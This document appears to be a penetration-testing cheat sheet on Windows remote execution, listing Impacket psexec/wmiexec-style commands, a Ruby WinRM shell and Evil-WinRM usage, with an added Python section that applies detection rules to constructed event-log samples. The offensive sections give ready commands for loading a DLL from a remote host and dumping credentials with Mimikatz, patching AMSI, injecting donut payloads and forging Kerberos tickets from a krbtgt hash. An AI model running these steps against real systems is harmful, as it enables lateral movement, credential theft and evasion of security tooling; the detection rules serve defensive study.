Remote Execution Techniques

Impacket tools

https://www.secureauth.com/labs/open-source-tools/impacket
# psexec
# PSEXEC-like functionality example using RemComSvc (https://github.com/kavika13/RemCom).
psexec.py domain/user:password@IP <command>
# smbexec
# A similar approach to PSEXEC without using RemComSvc. The technique is described here.
# It instantiates a local SMB server to receive the output of the commands.
# This is useful when the target machine does NOT have a writeable share available.
smbexec.py domain/user:password@IP <command>
# atexec
# This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
atexec.py domain/user:password@IP <command>
# wmiexec
# A semi-interactive shell, used through Windows Management Instrumentation.
# It does not require installing any service/agent on the target server. Runs as Administrator. Highly stealthy.
wmiexec.py domain/user:password@IP <command>
# dcomexec
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
# Currently supports the MMC20.Application, ShellWindows and ShellBrowserWindow objects.
dcomexec.py domain/user:password@IP <command>

WinRM

# You can use WinRM to execute remote commands and even get a shell
# Port 5985 needs to be open
# The default endpoint is /wsman
require 'winrm'

conn = WinRM::Connection.new(
  endpoint: 'http://ip:5985/wsman',
  user: 'domain/user',
  password: 'password',
)

conn.shell(:powershell) do |shell|
  output = nil
  loop do
    print "PS > "
    command = gets
    # Stop on "exit" or when stdin is closed (gets returns nil) without
    # sending that last line to the remote shell
    break if command.nil? || command.strip == "exit"
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}" if output
end
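Each of the techniques above (Impacket's psexec, smbexec, atexec, wmiexec and dcomexec, and WinRM) leaves a characteristic trace in the Windows event logs: a service installation (System 7045), a scheduled task registration (Security 4698) or a process creation with a telling parent and command line (Security 4688). The script below is an added example, not part of these notes, of Impacket or of the winrm gem: it runs simple detection rules over sample records. The field names (EventID, Computer, ServiceName, ImagePath, TaskName, ParentProcessName, NewProcessName, CommandLine) are assumptions about how a log pipeline flattens those events, and the sample values are constructed to resemble the artifacts these tools leave, not captured logs.

```python
"""Detection rules for the remote-execution techniques listed in these notes.

Added example (not from the original notes, Impacket or the winrm gem).
Input records are constructed here to resemble flattened Windows events:
System 7045 (service installed), Security 4698 (scheduled task created)
and Security 4688 (process created with parent and command line).
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample records; service names, task names, paths and
# timestamps are illustrative, not real log data.
SAMPLE_EVENTS: List[Event] = [
    # psexec-style: a well-known remote-exec service name is installed
    {"EventID": "7045", "Computer": "ws01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # smbexec-style: the service "binary" is a cmd.exe one-liner that
    # writes its output to a share instead of pointing at an executable
    {"EventID": "7045", "Computer": "ws01", "ServiceName": "BTOBTO",
     "ImagePath": "%COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 "
                  "> %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat"},
    # legitimate service install, for contrast
    {"EventID": "7045", "Computer": "ws01", "ServiceName": "BackupAgent",
     "ImagePath": "C:\\Program Files\\Backup\\agent.exe"},
    # atexec-style: task with a random-looking name registered in the root folder
    {"EventID": "4698", "Computer": "ws02", "SubjectUserName": "admin",
     "TaskName": "\\zjqLkdbc"},
    # wmiexec-style: the WMI provider host spawns cmd.exe redirecting to ADMIN$
    {"EventID": "4688", "Computer": "ws03",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.1 2>&1"},
    # dcomexec (MMC20.Application)-style: mmc.exe spawns cmd.exe the same way
    {"EventID": "4688", "Computer": "ws03",
     "ParentProcessName": "C:\\Windows\\System32\\mmc.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /Q /c hostname 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.2 2>&1"},
    # WinRM-style: the WinRM provider host spawns PowerShell
    {"EventID": "4688", "Computer": "ws04",
     "ParentProcessName": "C:\\Windows\\System32\\wsmprovhost.exe",
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -NoLogo"},
    # benign process creation, for contrast
    {"EventID": "4688", "Computer": "ws04",
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Output redirected to a loopback admin share (the wmiexec/dcomexec/smbexec pattern)
SHARE_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\(?:admin|c)\$\\", re.IGNORECASE)
# Heuristic: an 8-letter task name directly under the root task folder
RANDOM_TASK = re.compile(r"^\\[A-Za-z]{8}$")
KNOWN_SERVICES = {"psexesvc", "remcomsvc"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (or of a %VAR%-prefixed path)."""
    return path.rsplit("\\", 1)[-1].lower()


RULES: Dict[str, Callable[[Event], bool]] = {
    "psexec-style service install": lambda e: e["EventID"] == "7045" and (
        e.get("ServiceName", "").lower() in KNOWN_SERVICES
        or basename(e.get("ImagePath", "")).removesuffix(".exe") in KNOWN_SERVICES),
    "smbexec-style service (cmd.exe one-liner as ImagePath)": lambda e: e["EventID"] == "7045" and (
        e.get("ImagePath", "").upper().startswith("%COMSPEC%")
        or bool(SHARE_REDIRECT.search(e.get("ImagePath", "")))),
    "atexec-style scheduled task": lambda e: e["EventID"] == "4698"
        and bool(RANDOM_TASK.match(e.get("TaskName", ""))),
    "wmiexec-style process": lambda e: e["EventID"] == "4688"
        and basename(e.get("ParentProcessName", "")) == "wmiprvse.exe"
        and basename(e.get("NewProcessName", "")) in {"cmd.exe", "powershell.exe"},
    "dcomexec-style process": lambda e: e["EventID"] == "4688"
        and basename(e.get("ParentProcessName", "")) in {"mmc.exe", "explorer.exe"}
        and bool(SHARE_REDIRECT.search(e.get("CommandLine", ""))),
    "winrm-spawned process": lambda e: e["EventID"] == "4688"
        and basename(e.get("ParentProcessName", "")) == "wsmprovhost.exe",
}


def classify(event: Event) -> List[str]:
    """Names of every rule that matches one event."""
    return [name for name, rule in RULES.items() if rule(event)]


def scan(events: List[Event]) -> List[Tuple[str, str]]:
    """(host, rule name) pairs for every match across a batch of events."""
    return [(e.get("Computer", "?"), name) for e in events for name in classify(e)]


if __name__ == "__main__":
    for host, name in scan(SAMPLE_EVENTS):
        print(f"{host}: {name}")
```

The explorer.exe parent is only flagged together with the loopback-share redirection, because a user opening a console from the desktop produces the same parent/child pair; the wmiprvse.exe and wsmprovhost.exe parents are rare enough in most estates that the parent alone is worth an alert, which is why those rules do not look at the command line.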

Evil-WinRm

# Evil-WinRM is another complete tool for WinRM
https://github.com/Hackplayers/evil-winrm

# Simple usage
$ ruby evil-winrm.rb -i 10.10.10.172 -u user -p password

# Upload and Download
> upload local_filename (destination_filename)
> download remote_filename (destination_filename)

# List all services, showing whether your account has permissions over each one
> services

# Menu listing loaded modules (default presented below)
> menu
# You can load local PS1 scripts just by typing the script name
# The scripts must be in the path set with the -s argument
> Powerview.ps1
> menu

# Using advanced commands

# Invoke-Binary
# Allows exes compiled from C# to be executed in memory
# The executables must be in the path set with the -e argument
> Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'

# DLL Loader
# Allows loading DLL libraries in memory. The DLL file can be hosted over SMB, HTTP or locally.
# You can then use auto-completion
> Dll-Loader -http -path http://xx.xx.xx.xx/sharpsploit.dll
> [Sharpsploit.Credentials.Mimikatz]::LogonPasswords()

# Donut Loader
# Allows injecting x64 payloads generated with the donut technique
# No need to encode the payload.bin, just generate and inject
https://github.com/Hackplayers/Salsa-tools/blob/master/Donut-Maker/donut-maker.py
python3 donut-maker.py covenant.exe

# Bypass-4MSI
# Patches AMSI protection
> amsiscanbuffer
> Bypass-4MSI
> amsiscanbuffer

# Using Kerberos

# First, synchronise the date with the DC
rdate -n <dc-ip>

# Ticket generation (ticketer.py, or a kirbi ticket from Rubeus or Mimikatz...)
ticketer.py -dc-ip <dc_ip> -nthash <krbtgt_nthash> -domain-sid <domain_sid> -domain <domain_name> <user>
python ticket_converter.py ticket.kirbi ticket.ccache

# Load the ccache ticket (2 ways)
export KRB5CCNAME=/foo/var/ticket.ccache
cp ticket.ccache /tmp/krb5cc_0

# Add the realm to /etc/krb5.conf (on Linux), under the [realms] section. Use of this format is important
[realms]
CONTOSO.COM = {
    kdc = fooserver.contoso.com
}

# Check ticket
klist